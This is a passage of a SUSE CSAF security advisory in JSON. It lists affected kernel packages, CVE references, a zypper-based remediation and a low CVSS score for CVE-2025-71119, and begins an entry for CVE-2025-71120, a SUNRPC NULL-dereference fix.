"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
